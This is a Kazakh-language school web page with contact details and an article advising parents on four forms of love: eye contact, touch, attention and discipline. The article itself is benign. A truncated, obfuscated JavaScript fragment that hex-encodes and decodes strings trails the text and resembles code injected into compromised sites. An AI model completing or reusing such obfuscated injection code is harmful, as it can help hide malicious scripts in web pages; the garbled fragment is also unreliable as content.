Сенім телефоны
601920
email: sosh26@goo.edu.kz
Мекенжайы: Павлодар қаласы, Семенченко көшесі, 70
601920, 602114, 601968
Білім бөлімінің басты бетіне қайту
Азаматтарды жеке қабылдау кестесі:
дүйсенбі 15.00 - 18.00, жұма 11.30 - 13.30
За год
За месяц
За неделю
Вчера
Ата-ана махаббаты және оның бала тәрбиесіндегі рөлі
Әлемде баласына ұрысқысы келетін ана жоқ. «Мен бүгін балама айқайлаймын, ұрысамын» деп ана ойламайды. Керісінше! Ана бүгінгі күнді жақсы, шусыз блуын тілейді. Бірақ та, осынадй жақсы пиғылдарға қарамастан, баласына айқайлайды. Ешкімге керек емес ата-анамен мен бала арасындағы соғыс қате басталады. Балаға ол қатты әсер етеді. Өз баласының проблемасына түсінікпен қарау керек. Баланы жақсы көру керек, әке мен шеше оның бақытты болуына жауапты. Құрметті ата-аналар, балаға деген махаббатты қалай түсінесіздер? Барлық балаға деген махаббат 4 түрге бөлінеді: көз қатынасы, түйісу, көңіл аудару, тәртіп. Әрқайсысы өте маңызды. Неге? Оны біз кейін талқылаймыз.

Көз қатынасы

Көптеген адамдар баламен қарым-қатынастың шешуші факторы көз қатынасы екендігін сезіне бермейді. Көз қатынасы бір-біріңе қараған кездегі уақыт. Сіздің көзіңізге тура қараудан қорқатын адаммен тілдесіп көрдіңіз бе? Бұл біздің оған деген қатынасымызды өзгертеді. Бізге тура, күлімсіреп қарайтын адам ұнайды. Баланың көзіне тура қарасақ, сонда ғана ол мұқият тыңдайды. Сіздің көзіңізден әрқашан махаббат ұшқыны білінуі керектігін ұмытпағайсыз. Көптеген ата-ана баласына қатал көзімен қарайды, ол дұрыс емес.

Түйісу

Әлеуметтік педагогикада мынадай факт көрсетілген: зерттеулер көрсеткендей, көптеген ата-ана баласын киіндіргенде, автобусқа отырғызғанда т.б. түйіседі. Баламен кез-келген түйісу, мысалы. Қолын алу, құшақтау, басын сипау, шашын ұстау т.б. болуы мүмкін. Әсіресе, мұндай түйісу ұл балаға керек, оның 7-8 жасқа дейін дамуына қажет. Бала өскен сайын ата-ананың еркелеткенін қажет етпейді. Кейде бала осынадай түйісуді қажет етеді (қорқыныш, қиындық) туындаған кезде. Қыз балаға түйісу өте қажет, әсіресе, 11 жаста.

Көңіл аудару

Балаға көңіл аудару көп уақытты талап етеді. Көңіл аудару дегеніміз не? Ұсақ-түйекке алданбай түгел балаға көңіліміз ауу керек, бала ата-ананың махаббатын сезінуі керек. Балаға көңіл аудару неге қиын? Өйткені ол көп уақытты талап етеді. Құрметті ата-аналар, уақыт тауып, баламен бірге болыңыз. Бұл өте маңызды. Жақсы тәрбие уақытты талапетеді. Егер де отбасында көп бала болса, Әрқайсысына уақыт бөлу қиын. Ата-ана баласына бір минутын да қимаса, онда ол ата-ана махаббатын сезіне алмайды.

Тәртіп

Ата-ана махаббатының 4-кезеңі – тәртіп. Кейбір ата-аналар тәртіпті жаза деп ұғады. Құрметті ата-аналар, бұл дұрыс емес. Ең бірінші біздің түсінетініміз – ол баланы тәртіпке үйрету үшін , оны жақсы көретінімізді сезінуіміз керек. Егер де махаббат болмаса, бала ата-анаға қарсы шығады, реніш білдіреді. Баланы тыңдап, өз эмоцияңызды ұстауыңыз қажет. Егер де ата-ана жиі шамданып, балаға ашуланса, алғашында бала шоши бастайды. Кейін ата-ана өз беделін жоғалтып, баланың теріс қылықтарының туындауына жол ашады. Баладан жақсы тәртәпті талап ету үшін, баламен мейірімді болу керек. Қорыта келгенде, мынаны есте сақтаған маңызды. Егер сіз баланы жақсы тәрбиелегіңіз келсе – әр балаға көз қатынасы, түйісу, махаббат, тәртіп қажет. Бала біздің махаббатымызды, қаталдығымызды сезіну керек. Ата-ана махаббатында әртүрлі жақтар бар, оның бірі баласына деген шектен тыс махаббат. Ондай ата-ана баланың әр еркелігін көтереді, қатты айтуға қорқады. Ата-ананың балаға деген шектен тыс махаббаты баланы бұзады. Бала ата-анасымен санаспайды, соңында бала эгоист болып өседі. Кейбір ата-ана өз махаббатын жасырып, баласына жылы, мейірімді сөз айтуға қорқады. Осындай отбасында бала тұйық болып өседі. Болашақта ашыла алмайды. Баланың көңіл-күй жағдайы әлемді қалай көруіне байланысты: ата-анасын, үйін, өзін-өзі. Осы көңіл-күй жағдайы болашақ дамудың платформасы болып табылады. Егер, балаға әлем жиіркенішті , қорқынышты болып көрінсе, қорқыныш, уайым пайда болады, олар баланың мейірімсіз жаулары. Егер, біз оны жақсы көрсек, оның жетістігің, тәртібі үшін жақсы көрсек, ол өз-өзіне деген сенімсіздігін жоғалтып, уайымшыл бола бастайды.Өйткені бала өте сезімтал. Барлық бала ата-анасынан сұрайды: «Сіздер мені жақсы көресіздер ме?» - деп. Баланың өмірге деген қатынасы, көзқарасы ата-анасының осы жауабына байланысты. // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e)/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(),p=function()for(var e=0;e